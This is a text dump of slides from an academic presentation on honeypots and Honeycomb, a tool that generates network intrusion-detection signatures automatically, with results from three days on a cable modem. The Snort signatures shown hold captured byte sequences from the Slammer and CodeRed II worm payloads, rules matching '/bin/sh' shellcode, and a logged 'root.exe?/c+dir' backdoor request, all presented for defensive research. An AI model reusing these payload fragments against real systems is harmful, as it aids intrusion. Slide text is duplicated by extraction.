Скачать презентацию Honeycomb and the current state of Honeypot Technology Скачать презентацию Honeycomb and the current state of Honeypot Technology

4aa531aa47e1d892a442cf0919c384f2.ppt

  • Количество слайдов: 31

Honeycomb and the current state of Honeypot Technology Christian Kreibich christian. kreibich@cl. cam. ac. Honeycomb and the current state of Honeypot Technology Christian Kreibich christian. [email protected] cam. ac. uk

Coming up. . . 4 Introduction to Honeypots 4 Current state of the art: Coming up. . . 4 Introduction to Honeypots 4 Current state of the art: Honeynets 4 Honeycomb - automated NIDS signature creation 4 Three days in the life of an unprotected cable modem connection

So what’s a Honeypot? 4“A Honeypot is a computer resource set up for the So what’s a Honeypot? 4“A Honeypot is a computer resource set up for the purpose of monitoring and logging the activities of entities that probe, attack or compromise it. ” (My attempt on [email protected] com) 4 No production value, should see no traffic. 4 Interaction with these systems likely malicious. 4 Flexible concept, not a fixed tool. 4 Not new: Coockoo’s Egg, Evening with Berferd

Types of Honeypots 4 Low interaction: 4 Trap files, database entries etc (“Honeytokens”) 4 Types of Honeypots 4 Low interaction: 4 Trap files, database entries etc (“Honeytokens”) 4 Emulated services and operating systems 4 Easier to deploy, limited capabilities. 4 High interaction: 4 Runs real systems 4 Need to limit harm that can be done 4 More to learn, more complexity, more risk!

Low interaction: fake services 4 From a fake FTP server shell script: case $command Low interaction: fake services 4 From a fake FTP server shell script: case $command in QUIT* ) echo exit SYST* ) echo ; ; HELP* ) echo echo ; ; -e "221 Goodbye. r" 0; ; -e "215 UNIX Type: L 8r" -e -e "214 -The following commands are recognized (* =>'s unimplemented). r" " USER PORT STOR MSAM* RNTO NLST MKD CDUPr" " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUPr" " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOUr" " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZEr" " REIN* MODE MSND* REST XCWD HELP PWD MDTMr" " QUIT RETR MSOM* RNFR LIST NOOP XPWDr" "214 Direct comments to [email protected]$domain. r"

High interaction: Honeynets 4 Gen II Honeynet Production Network Honeypots Internet High interaction: Honeynets 4 Gen II Honeynet Production Network Honeypots Internet

High interaction: Honeynets 4 Gen II Honeynet Production Network Internet 4 Honeywall 4 Layer High interaction: Honeynets 4 Gen II Honeynet Production Network Internet 4 Honeywall 4 Layer 2 bridge 4 IDS Gateway 4 iptables 4 snort_inline Honeypots 4 Control & Report interface

snort_inline 4 drop tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg: snort_inline 4 drop tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg: "DNS EXPLOIT named"; flags: A+; content: "|CD 80 E 8 D 7 FFFFFF|/bin/sh"; 4 alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg: "DNS EXPLOIT named"; flags: A+; content: "|CD 80 E 8 D 7 FFFFFF|/bin/sh"; replace: "|0000 E 8 D 7 FFFFFF|/ben/sh"; )

High interaction: Honeynets 4 Gen II Honeynet Production Network Honeypots Internet 4 Sebek 2 High interaction: Honeynets 4 Gen II Honeynet Production Network Honeypots Internet 4 Sebek 2 4 Surveillance “rootkit” 4 Kernel module 4 Captures all activity on pots 4 Sends details to Honeywall 4 Prevents sniffing of its traffic 4 Sebeksniff

Honey Inspector Honey Inspector

Honeycomb 4 Goal: automated generation of NIDS signatures 4 Name? Nice double meaning. . Honeycomb 4 Goal: automated generation of NIDS signatures 4 Name? Nice double meaning. . .

Honeycomb 4 Goal: automated generation of NIDS signatures 4 Name? Nice double meaning. . Honeycomb 4 Goal: automated generation of NIDS signatures 4 Name? Nice double meaning. . . 4 Combing for patterns in Honeypot traffic

Honeycomb’s Architecture Honeycomb’s Architecture

Honeycomb’s Algorithm Honeycomb’s Algorithm

Pattern Detection (I) 4 Stream reassembly: Pattern Detection (I) 4 Stream reassembly:

Pattern Detection (II) 4 Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka 4 Can Pattern Detection (II) 4 Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka 4 Can be done in O(|m 1| + |m 2|) using suffix trees 4 Implemented libstree, generic suffix tree library 4 No hardcoding of protocol-specific knowledge

Pattern Detection (II) 4 Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka 4 Can Pattern Detection (II) 4 Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka 4 Can be done in O(|m 1| + |m 2|) using suffix trees 4 Implemented libstree, generic suffix tree library 4 No hardcoding of protocol-specific knowledge

Pattern Detection (III) 4 Horizontal detection: 4 LCS on pairs of messages 4 each Pattern Detection (III) 4 Horizontal detection: 4 LCS on pairs of messages 4 each message independent 4 e. g. (persistent) HTTP

Pattern Detection (IV) 4 Vertical detection: 4 concatenates incoming messages 4 LCS on pairs Pattern Detection (IV) 4 Vertical detection: 4 concatenates incoming messages 4 LCS on pairs of strings 4 for interactive flows and to mask TCP dynamics 4 e. g. FTP, Telnet, . . .

Signature Pool 4 Limited-size queue of current signatures 4 Relational operators on signatures: 4 Signature Pool 4 Limited-size queue of current signatures 4 Relational operators on signatures: 4 sig 1 = sig 2: all elements equal 4 sig 1 sig 2: sig 1 contains subset of sig 2’s facts 4 signew = sigpool: signew ignored 4 signew sigpool: signew added 4 sigpool signew: signew augments sigpool 4 Signature correlation on destination ports 4 Avoids duplicates for trivial flows (portscan!)

Results 4 We ran Honeycomb on an unfiltered cable modem connection 4 Honeyd setup: Results 4 We ran Honeycomb on an unfiltered cable modem connection 4 Honeyd setup: fake FTP, Telnet, SMTP, Apache services, all Perl/Shell scripts. 4 Three day period 4 Some statistics: 4 649 TCP connections, 123 UDP connections 4 143 Pings, almost exclusively UDP port 137 (Net. BIOS) 4 Full traffic volume: ~1 MB 4 No wide-range portscanning

TCP Connections HTTP Kuang 2 Virus/Trojan Net. BIOS - W 32/Deluder Worm Net. BIOS TCP Connections HTTP Kuang 2 Virus/Trojan Net. BIOS - W 32/Deluder Worm Net. BIOS - open shares Microsoft SQL Server

UDP Connections Net. BIOS Nameservice Messenger Service Slammer UDP Connections Net. BIOS Nameservice Messenger Service Slammer

Signatures created: Slammer 4 1434/UDP worm, Microsoft SQL Server buffer overflow 4 Honeyd log: Signatures created: Slammer 4 1434/UDP worm, Microsoft SQL Server buffer overflow 4 Honeyd log: 4 2003 -05 -08 -02: 26: 43. 0385 2003 -05 -08 -02: 27: 43. 0404 2003 -05 -08 -09: 58: 38. 0807 2003 -05 -08 -09: 59: 38. 0813 2003 -05 -08 -17: 15: 24. 0072 2003 -05 -08 -17: 16: 24. 0083 udp(17) udp(17) S E S E 81. 89. 64. 111 2943 192. 168. 169. 2 1434: 376 0 216. 164. 19. 162 1639 192. 168. 169. 2 1434: 376 0 66. 28. 200. 226 6745 192. 168. 169. 2 1434: 376 0 4 Signature: 4 alert udp any -> 192. 168. 169. 2/32 1434 (msg: "Honeycomb Thu May 8 09 h 58 m 38 2003 "; content: "|04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C 9 B 0|B|EB 0 E 01 01|p|AE|B|90 90 90|h|DC C 9 B 0|B|B 8 01 01|1|C 9 B 1 18|P|E 2 FD|5|01 01 01 05|P|89 E 5|Qh. dllhel 32 hkern. Qhounthick. Ch. Get. Tf|B 9|ll. Qh 32. dhws 2 f|B 9|et. Qhsockf|B 9|to. Qhsend|BE 18 10 AE|B|8 D|E|D 4|P|FF 16|P|8 D|E|E 0|P|8 D|E|F 0|P|FF 16|P|BE 10 10 AE|B|8 B 1 E 8 B 03|=U|8 B EC|Qt|05 BE 1 C 10 AE|B|FF 16 FF D 0|1|C 9|QQP|81 F 1 03 01 04 9 B 81 F 1 01 01|Q|8 D|E|CC|P|8 B|E|C 0|P|FF 16|j|11|j|02 FF D 0|P|8 D|E|C 4|P|8 B|E|C 0|P|FF 16 89 C 6 09 DB 81 F 3|

Signatures created: Code. Red. II 4 80/TCP worm, Microsoft IIS Buffer Overflow 4 Hit Signatures created: Code. Red. II 4 80/TCP worm, Microsoft IIS Buffer Overflow 4 Hit more than a dozen times 4 4 alert tcp 80. 0/8 any -> 192. 168. 169. 2/32 80 ( msg: "Honeycomb Tue May 6 11 h 55 m 20 2003 "; flags: A; flow: established; content: " GET /default. ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX %u 9090%u 6858%ucbd 3%u 7801%u 9090%u 8190%u 00 c 3%u 0003%u 8 b 00%u 531 b%u 53 ff%u 0078%u 0000%u 00= a HTTP/1. 0|0 D 0 A|Content-type: text/xml|0 A|Content-length: 3379 |0 D 0 A C 8 01 00|`|E 8 03 00 00 00 CC EB FE|dg|FF|6|00 00|dg|89|&|00 00 E 8 DF 02 00 00|h|04 01 00 00 8 D 85||FE FF FF|P|FF|U|9 C 8 D 85||FE FF FF|P|FF|U|98 8 B|@|10 8 B 08 89 8 D|X|FE FF FF FF|U|E 4|=|04 04 00 00 0 F 94 C 1|=|04 08 00 00 0 F 94 C 5 0 A CD 0 F B 6 C 9 89 8 D|T|FE FF FF 8 B|u|08 81|~0|9 A 02 00 00 0 F 84 C 4 00 00 00 C 7|F 0|9 A 02 00 00 E 8 0 A 00 00 00|Code. Red. II|00 8 B 1 C|$|FF|U|D 8|f|0 B C 0 0 F 95 85|8|FE FF FF C 7 85|P|FE FF FF 01 00 00 00|j|00 8 D 85|P|FE FF FF|P|8 D 85|8|FE FF FF|P|8 B|E|08 FF|p|08 FF 90 84 00 00 00 80 BD|8|FE FF FF 01|th. S|FF|U|D 4 FF|U|EC 01|E|84|i|BD|T|FE FF FF|, |01 00 00 81 C 7|, |01 00 00 E 8 D 2 04 00 00 F 7 D 0 0 F AF C 7 89|F 4|8 D|E|88|Pj|00 FF|u|08 E 8 05 00 00 00 E 9 01 FF FF FF|j|00 FF|U|F 0|P|FF|U|D 0|Ou|D 2 E 8|; |05 00 00|i|BD|T|FE FF FF 00|&|05 81 C 7 00|&|05|W|FF|U|E 8|j|00|j|16 FF|U|8 C|j|FF FF|U|E 8 EB F 9 8 B|F 4)E|84|jd|FF|U|E 8 8 D 85|<|FE FF FF|P|FF|U|C 0 0 F B 7 85|<|FE FF FF|=|88 88 00 00|s|CF 0 F B 7 85|>|FE FF FF 83 F 8 0 A|s|C 3|f|C 7 85|p|FF FF FF 02 00|f|C 7 85|r|FF FF … 4 Full worm, due to vertical detection – server replies before all packets seen!

Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. 168. 169. 2/32 1080, 3128, 4588, 6588, 8080 (msg: "Honeycomb Mon May 5 19 h 04 m 12 2003 "; flags: S; flow: stateless; ) 4 Lookup: 2. 104. 201. 64. in-addr-arpa domain name pointer for. information. see. proxyprotector. com

Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. 168. 169. 2/32 1080, 3128, 4588, 6588, 8080 (msg: "Honeycomb Mon May 5 19 h 04 m 12 2003 "; flags: S; flow: stateless; ) 4 Lookup: 2. 104. 201. 64. in-addr-arpa domain naime pointer for. information. see. proxyprotector. com 4 alert udp 81. 152. 239. 141/32 any -> 192. 168. 169. 2/32 135 (msg: "Honeycomb Thu May 8 12 h 57 m 51 2003 "; content: "|15 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E 1 04|x|0 C 00 00 0 C 00 00 00|80. 4. 124. 41|00|#|01 00 00| Amazing Internet Product Sells Itself!|0 D 0 A|Resellers Wanted! GO TO. . . www. Now 4 U 2. co. uk"; )

Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. 168. 169. 2/32 1080, 3128, 4588, 6588, 8080 (msg: "Honeycomb Mon May 5 19 h 04 m 12 2003 "; flags: S; flow: stateless; ) 4 Lookup: 2. 104. 201. 64. in-addr-arpa domain naime pointer for. information. see. proxyprotector. com 4 alert udp 81. 152. 239. 141/32 any -> 192. 168. 169. 2/32 135 (msg: "Honeycomb Thu May 8 12 h 57 m 51 2003 "; content: "|15 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E 1 04|x|0 C 00 00 0 C 00 00 00|80. 4. 124. 41|00|#|01 00 00| Amazing Internet Product Sells Itself!|0 D 0 A|Resellers Wanted! GO TO. . . www. Now 4 U 2. co. uk"; ) 4 135/UDP lets you pop up spam^H^H Internet Advertisements on other Windows machines via Messenger Service 4

Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. Signatures detected: others … 4 alert tcp 64. 201. 104. 2/32 any -> 192. 168. 169. 2/32 1080, 3128, 4588, 6588, 8080 (msg: "Honeycomb Mon May 5 19 h 04 m 12 2003 "; flags: S; flow: stateless; ) 4 Lookup: 2. 104. 201. 64. in-addr-arpa domain naime pointer for. information. see. proxyprotector. com 4 alert udp 81. 152. 239. 141/32 any -> 192. 168. 169. 2/32 135 (msg: "Honeycomb Thu May 8 12 h 57 m 51 2003 "; content: "|15 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E 1 04|x|0 C 00 00 0 C 00 00 00|80. 4. 124. 41|00|#|01 00 00| Amazing Internet Product Sells Itself!|0 D 0 A|Resellers Wanted! GO TO. . . www. Now 4 U 2. co. uk"; ) 4 135/UDP lets you pop up spam^H^H Internet Advertisements on other Windows machines via Messenger Service 4 alert tcp 80. 4. 218. 53/32 any -> 192. 168. 169. 2/32 80 (msg: "Honeycomb Thu May 8 07 h 27 m 33 2003 "; flags: PA; flow: established; content: "GET /scripts/root. exe? /c+dir HTTP/1. 0|0 D 0 A|Host: www|0 D 0 A|Connnection: close|0 D 0 A 0 D|"; ) 4

Summary 4 System detects patterns in network traffic 4 Good at worm detection – Summary 4 System detects patterns in network traffic 4 Good at worm detection – if not polymorphic! 4 Approach still simplistic – approximate matching? 4 TODO list 4 Reasonable setup 4 Performance evaluation 4 Better signature reporting scheme 4 Log processing suite 4 Closer integration with honeyd

Thanks! 4 Shoutouts: a 13 x hØ && 1 ance 4 No machines were Thanks! 4 Shoutouts: a 13 x hØ && 1 ance 4 No machines were harmed or compromised in the making of this presentation. 4 [email protected] com 4 Questions?